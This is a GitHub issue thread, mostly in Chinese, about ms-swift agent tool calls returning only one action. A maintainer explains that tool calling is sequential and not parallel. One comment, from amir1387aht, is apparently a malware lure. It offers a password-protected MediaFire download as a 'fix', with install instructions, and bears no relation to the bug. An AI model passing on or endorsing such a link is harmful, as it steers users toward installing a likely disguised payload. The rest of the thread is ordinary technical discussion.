### ISSUE TITLE
agent tools工具在调用时思维链已经决定了多个action在tools_call时只返回一个

### ISSUE THREAD

**Issue by HJT9328** [modelscope/ms-swift#1826]
**Describe the bug**
agent tools工具在调用时思维链已经决定了多个action
![image](https://github.com/user-attachments/assets/6bd1a57b-5910-456d-8b7c-21c260d1e30f)
在tools_call时只返回一个
![image](https://github.com/user-attachments/assets/6e0ad257-99e5-407c-b08c-8ff4f7889e26)

**Your hardware and system info**

**Additional context**
是否是需要在请求tools时添加什么参数呢

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tastelikefeet** [comment]
你的response里面会有两个tool调用吗？讲道理不会啊，因为单个tool调用完成后要等待调用结果啊

**Comment by HJT9328** [comment]
> 你的response里面会有两个tool调用吗？讲道理不会啊，因为单个tool调用完成后要等待调用结果啊

response里只有一个返回的tool调用，但是我想实现多个的调用方式，在for循环中循序的调用tools

**Comment by tastelikefeet** [comment]
toolcalling不支持并行的，只能模型返回一个tool，用户调用，模型再返回tool
